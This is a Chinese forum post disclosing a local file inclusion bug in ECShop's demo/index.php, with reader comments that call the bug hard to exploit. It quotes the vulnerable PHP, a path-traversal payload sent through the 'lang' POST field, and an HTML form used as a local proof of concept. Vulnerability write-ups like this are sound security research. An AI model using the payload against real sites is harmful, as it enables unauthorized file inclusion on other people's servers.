ECShop网店系统最新版本地包含漏洞
ECShop网店系统最新版本地包含漏洞
BY:风之传说
这个洞,其实我在2012年1月的时候看ecshop就分析出来过,当初由于感觉鸡肋就没怎么放出来。刚下了个官网最新版的,没想到还存在。
Seay大牛的微博说,靠他的神器挖出一个漏洞,不知道是不是我找的这个,仔细看了下,他那个是GET提交的,应该不是我这个。话说也有好长时间没发文章了,我就发出来吧。
漏洞文件在:/demo/index.php为了方便测试,我在本地网站根目录下建立一个1.php
代码如下:然后利用如下:
POST提交lang=123_123_1/../../../1 成功包含 根目录下1.php
由于本机,搭建环境出了个问题,这个是借别人的图。。应该为post提交,这个漏洞鸡肋之处在于,魔术引号,后面貌似不能%00。
利用代码。保存为html。好了,分析到此结束。
BY:风之传说
这个洞,其实我在2012年1月的时候看ecshop就分析出来过,当初由于感觉鸡肋就没怎么放出来。刚下了个官网最新版的,没想到还存在。
Seay大牛的微博说,靠他的神器挖出一个漏洞,不知道是不是我找的这个,仔细看了下,他那个是GET提交的,应该不是我这个。话说也有好长时间没发文章了,我就发出来吧。
漏洞文件在:/demo/index.php
if (!empty($_POST['lang'])) //如果不为空
{
$lang_charset = explode('_', $_POST['lang']); //_分割
$updater_lang = $lang_charset[0].'_'.$lang_charset[1];
$ec_charset = $lang_charset[2]; //我们要控制的。
}
.
.
.
/* 加载升级程序所使用的语言包 */
$updater_lang_package_path = ROOT_PATH . 'demo/languages/' . $updater_lang . '_' . $ec_charset .'.php'; //成功进行控制
if (file_exists($updater_lang_package_path))
{
include_once($updater_lang_package_path); //存在就包含。
$smarty->assign('lang', $_LANG);
}
else
{
die('Can\'t find language package!');
}代码如下:
<?php
Phpinfo();
?>POST提交lang=123_123_1/../../../1 成功包含 根目录下1.php
由于本机,搭建环境出了个问题,这个是借别人的图。。应该为post提交,这个漏洞鸡肋之处在于,魔术引号,后面貌似不能%00。
利用代码。保存为html。
<html>
<body>
<form action="http://127.0.0.1/demo/index.php" method="post"
enctype="multipart/form-data">
<input type="text" name="lang" />
<br />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>关于作者
评论44次
沙发 来学xi了
demo的利用条件限制不少。。
demo/目录是不是官方就没有。。还是下载后一般都阉割掉了?找了很多都没这个目录
被删除的目录。。。
test +1 今天看了帖子又遇到了。 测试之后发现有点鸡肋
感谢分享 回头去测试看看
赞
感谢楼主的分享
有点鸡肋
挺好的
这个鸡勒 确实大 不过 学xi挖掘才是王道 其他都是浮云
是不是你下的版本不对,或者已经补了,少年你慢了。.gif)
由于 if(file_exists(ROOT_PATH ."data/install.lock")) { die('You have installed! '); } 这句的存在 你这个包含不能利用吧,我本地测试了下,根本就不行 大佬
看来很多私藏货啊
支持一下
是有点鸡肋,谢谢楼主的分享
那估计很久以前了。。中间有一年没玩黑。。
因为本来就鸡肋,就没怎么去测试,抱歉。。所以到官网下了一个,看着存在这个就发上了